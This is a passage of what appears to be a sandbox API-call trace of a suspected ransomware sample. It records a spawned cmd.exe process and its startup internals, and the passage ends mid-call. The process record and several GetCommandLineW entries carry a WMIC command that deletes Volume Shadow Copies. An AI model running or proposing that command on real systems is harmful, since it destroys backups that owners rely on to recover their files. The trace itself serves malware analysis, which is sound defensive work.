(_Block=0x3ec7e0) [0116.168] free (_Block=0x3ec800) [0116.168] free (_Block=0x3e8340) [0116.169] free (_Block=0x3ec820) [0116.169] free (_Block=0x3ec840) [0116.169] free (_Block=0x3e8380) [0116.169] free (_Block=0x3ec960) [0116.169] free (_Block=0x3ec980) [0116.169] free (_Block=0x3e84c0) [0116.169] free (_Block=0x3ec9a0) [0116.169] free (_Block=0x3ec9c0) [0116.169] free (_Block=0x3e8500) [0116.169] free (_Block=0x3ec760) [0116.169] free (_Block=0x3ec780) [0116.169] free (_Block=0x3e82c0) [0116.169] free (_Block=0x3ec7a0) [0116.169] free (_Block=0x3ec7c0) [0116.169] free (_Block=0x3e8300) [0116.169] free (_Block=0x3ec8e0) [0116.169] free (_Block=0x3ec900) [0116.169] free (_Block=0x3e8440) [0116.169] free (_Block=0x3ec920) [0116.170] free (_Block=0x3ec940) [0116.170] free (_Block=0x3e8480) [0116.170] free (_Block=0x3ec6a0) [0116.170] free (_Block=0x3ec6c0) [0116.170] free (_Block=0x3e8200) [0116.170] free (_Block=0x3ec560) [0116.170] free (_Block=0x3ec580) [0116.170] free (_Block=0x3e80c0) [0116.170] free (_Block=0x3e6e50) [0116.170] free (_Block=0x3e6e70) [0116.170] free (_Block=0x3e8080) [0116.170] free (_Block=0x3ec5e0) [0116.170] free (_Block=0x3ec600) [0116.170] free (_Block=0x3e8140) [0116.170] free (_Block=0x3ec6e0) [0116.170] free (_Block=0x3ec700) [0116.170] free (_Block=0x3e8240) [0116.170] free (_Block=0x3ec5a0) [0116.170] free (_Block=0x3ec5c0) [0116.170] free (_Block=0x3e8100) [0116.171] free (_Block=0x3ec620) [0116.171] free (_Block=0x3ec640) [0116.171] free (_Block=0x3e8180) [0116.171] free (_Block=0x3ec660) [0116.171] free (_Block=0x3ec680) [0116.171] free (_Block=0x3e81c0) [0116.171] free (_Block=0x3ec720) [0116.171] free (_Block=0x3ec740) [0116.171] free (_Block=0x3e8280) [0116.171] CoUninitialize () [0116.219] exit (_Code=0) [0116.219] free (_Block=0x3ecd30) [0116.219] free (_Block=0x3e7ea0) [0116.219] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0116.219] free (_Block=0x3e6f40) [0116.219] free (_Block=0x3e6a40) [0116.219] free (_Block=0x3e7e60) [0116.219] free (_Block=0x3e7e20) [0116.219] free (_Block=0x3e7dd0) [0116.219] free (_Block=0x3e7d90) [0116.219] free (_Block=0x3e7d30) [0116.219] free (_Block=0x3e5a90) [0116.219] free (_Block=0x3e5a50) [0116.219] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0116.219] free (_Block=0x3ecec0) Thread: id = 225 os_tid = 0x780 Thread: id = 226 os_tid = 0xa18 Thread: id = 227 os_tid = 0xa20 Thread: id = 228 os_tid = 0xafc Thread: id = 229 os_tid = 0x34c Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1d326000" os_pid = "0xa04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 230 os_tid = 0xaf0 [0116.322] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fd70 | out: lpSystemTimeAsFileTime=0x30fd70*(dwLowDateTime=0x4ce28bf0, dwHighDateTime=0x1d68245)) [0116.322] GetCurrentProcessId () returned 0xa04 [0116.322] GetCurrentThreadId () returned 0xaf0 [0116.322] GetTickCount () returned 0x1152ad8 [0116.322] QueryPerformanceCounter (in: lpPerformanceCount=0x30fd78 | out: lpPerformanceCount=0x30fd78*=23621493936) returned 1 [0116.322] GetModuleHandleW (lpModuleName=0x0) returned 0x4a020000 [0116.322] __set_app_type (_Type=0x1) [0116.322] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a047810) returned 0x0 [0116.322] __getmainargs (in: _Argc=0x4a06a608, _Argv=0x4a06a618, _Env=0x4a06a610, _DoWildCard=0, _StartInfo=0x4a04e0f4 | out: _Argc=0x4a06a608, _Argv=0x4a06a618, _Env=0x4a06a610) returned 0 [0116.323] GetCurrentThreadId () returned 0xaf0 [0116.323] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf0) returned 0x3c [0116.323] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0116.323] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0116.323] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.324] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fd08 | out: phkResult=0x30fd08*=0x0) returned 0x2 [0116.324] VirtualQuery (in: lpAddress=0x30fcf0, lpBuffer=0x30fc70, dwLength=0x30 | out: lpBuffer=0x30fc70*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0116.324] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc70, dwLength=0x30 | out: lpBuffer=0x30fc70*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0116.324] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc70, dwLength=0x30 | out: lpBuffer=0x30fc70*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0116.324] VirtualQuery (in: lpAddress=0x214000, lpBuffer=0x30fc70, dwLength=0x30 | out: lpBuffer=0x30fc70*(BaseAddress=0x214000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0116.324] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc70, dwLength=0x30 | out: lpBuffer=0x30fc70*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0116.324] GetConsoleOutputCP () returned 0x1b5 [0116.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a05bfe0 | out: lpCPInfo=0x4a05bfe0) returned 1 [0116.325] SetConsoleCtrlHandler (HandlerRoutine=0x4a043184, Add=1) returned 1 [0116.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0116.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.325] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a04e194 | out: lpMode=0x4a04e194) returned 1 [0116.325] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.325] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.325] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.325] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a04e198 | out: lpMode=0x4a04e198) returned 1 [0116.326] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.326] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0116.326] GetEnvironmentStringsW () returned 0xd8b90* [0116.326] GetProcessHeap () returned 0xc0000 [0116.326] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa7c) returned 0xd9620 [0116.326] FreeEnvironmentStringsW (penv=0xd8b90) returned 1 [0116.326] GetProcessHeap () returned 0xc0000 [0116.326] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x8) returned 0xd8a10 [0116.326] GetEnvironmentStringsW () returned 0xd8b90* [0116.327] GetProcessHeap () returned 0xc0000 [0116.327] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa7c) returned 0xda0b0 [0116.327] FreeEnvironmentStringsW (penv=0xd8b90) returned 1 [0116.327] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebc8 | out: phkResult=0x30ebc8*=0x44) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x18, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x1, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x1, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x0, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x40, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x40, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x40, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.327] RegCloseKey (hKey=0x44) returned 0x0 [0116.327] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebc8 | out: phkResult=0x30ebc8*=0x44) returned 0x0 [0116.327] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x40, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x1, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x1, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x0, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x9, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x4, lpData=0x30ebe0*=0x9, lpcbData=0x30ebc4*=0x4) returned 0x0 [0116.328] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebc0, lpData=0x30ebe0, lpcbData=0x30ebc4*=0x1000 | out: lpType=0x30ebc0*=0x0, lpData=0x30ebe0*=0x9, lpcbData=0x30ebc4*=0x1000) returned 0x2 [0116.328] RegCloseKey (hKey=0x44) returned 0x0 [0116.328] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517458 [0116.328] srand (_Seed=0x5f517458) [0116.328] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" [0116.328] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" [0116.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a05c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0116.328] GetProcessHeap () returned 0xc0000 [0116.328] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xdab40 [0116.328] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xdab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0116.329] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.329] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.329] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.329] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0116.329] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0116.329] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0116.329] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0116.329] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0116.329] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0116.329] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0116.329] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0116.329] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0116.329] GetProcessHeap () returned 0xc0000 [0116.329] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd9620 | out: hHeap=0xc0000) returned 1 [0116.329] GetEnvironmentStringsW () returned 0xd8b90* [0116.329] GetProcessHeap () returned 0xc0000 [0116.329] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa94) returned 0xdad60 [0116.330] FreeEnvironmentStringsW (penv=0xd8b90) returned 1 [0116.330] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.330] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a04f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.330] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0116.330] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0116.330] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0116.330] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0116.330] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0116.330] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0116.330] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0116.330] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0116.330] GetProcessHeap () returned 0xc0000 [0116.330] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x5c) returned 0xdb800 [0116.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f9d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0116.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f9d0, lpFilePart=0x30f9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f9b0*="Desktop") returned 0x25 [0116.330] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0116.331] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6e0 | out: lpFindFileData=0x30f6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0xdb870 [0116.331] FindClose (in: hFindFile=0xdb870 | out: hFindFile=0xdb870) returned 1 [0116.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f6e0 | out: lpFindFileData=0x30f6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xdb870 [0116.331] FindClose (in: hFindFile=0xdb870 | out: hFindFile=0xdb870) returned 1 [0116.331] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0116.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f6e0 | out: lpFindFileData=0x30f6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0xdb870 [0116.331] FindClose (in: hFindFile=0xdb870 | out: hFindFile=0xdb870) returned 1 [0116.332] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0116.332] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0116.332] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0116.332] GetProcessHeap () returned 0xc0000 [0116.332] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdad60 | out: hHeap=0xc0000) returned 1 [0116.332] GetEnvironmentStringsW () returned 0xdb870* [0116.332] GetProcessHeap () returned 0xc0000 [0116.332] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xae8) returned 0xdc360 [0116.332] FreeEnvironmentStringsW (penv=0xdb870) returned 1 [0116.332] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a05c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0116.332] GetProcessHeap () returned 0xc0000 [0116.332] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdb800 | out: hHeap=0xc0000) returned 1 [0116.332] GetProcessHeap () returned 0xc0000 [0116.332] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4016) returned 0xdce50 [0116.333] GetProcessHeap () returned 0xc0000 [0116.333] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe4) returned 0xd9680 [0116.333] GetProcessHeap () returned 0xc0000 [0116.333] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdce50 | out: hHeap=0xc0000) returned 1 [0116.333] GetConsoleOutputCP () returned 0x1b5 [0116.333] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a05bfe0 | out: lpCPInfo=0x4a05bfe0) returned 1 [0116.333] GetUserDefaultLCID () returned 0x409 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a057b50, cchData=8 | out: lpLCData=":") returned 2 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fae0, cchData=128 | out: lpLCData="0") returned 2 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fae0, cchData=128 | out: lpLCData="0") returned 2 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fae0, cchData=128 | out: lpLCData="1") returned 2 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a06a740, cchData=8 | out: lpLCData="/") returned 2 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a06a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a06a460, cchData=32 | out: lpLCData="Tue") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a06a420, cchData=32 | out: lpLCData="Wed") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a06a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a06a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a06a360, cchData=32 | out: lpLCData="Sat") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a06a700, cchData=32 | out: lpLCData="Sun") returned 4 [0116.334] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a057b40, cchData=8 | out: lpLCData=".") returned 2 [0116.335] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a06a4e0, cchData=8 | out: lpLCData=",") returned 2 [0116.335] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0116.335] GetProcessHeap () returned 0xc0000 [0116.335] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x20c) returned 0xd97e0 [0116.335] GetConsoleTitleW (in: lpConsoleTitle=0xd97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0116.336] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0116.336] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0116.336] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0116.336] GetProcessHeap () returned 0xc0000 [0116.336] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4012) returned 0xdce50 [0116.336] GetProcessHeap () returned 0xc0000 [0116.336] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdce50 | out: hHeap=0xc0000) returned 1 [0116.339] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0116.339] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0116.339] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0116.339] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0116.339] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0116.339] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0116.339] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0116.340] GetProcessHeap () returned 0xc0000 [0116.340] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0) returned 0xd9a00 [0116.340] GetProcessHeap () returned 0xc0000 [0116.340] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x54) returned 0xd9ac0 [0116.343] GetProcessHeap () returned 0xc0000 [0116.343] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x9e) returned 0xd9b20 [0116.343] GetConsoleTitleW (in: lpConsoleTitle=0x30f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.344] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f580, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f560, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f560*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0116.344] GetProcessHeap () returned 0xc0000 [0116.344] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xd9bd0 [0116.344] GetProcessHeap () returned 0xc0000 [0116.344] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe2) returned 0xd9df0 [0116.344] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0116.345] GetProcessHeap () returned 0xc0000 [0116.345] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x420) returned 0xc1320 [0116.345] SetErrorMode (uMode=0x0) returned 0x8001 [0116.345] SetErrorMode (uMode=0x1) returned 0x0 [0116.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0xc1330, lpFilePart=0x30f280 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x30f280*="wbem") returned 0x18 [0116.345] SetErrorMode (uMode=0x8001) returned 0x1 [0116.345] GetProcessHeap () returned 0xc0000 [0116.345] RtlReAllocateHeap 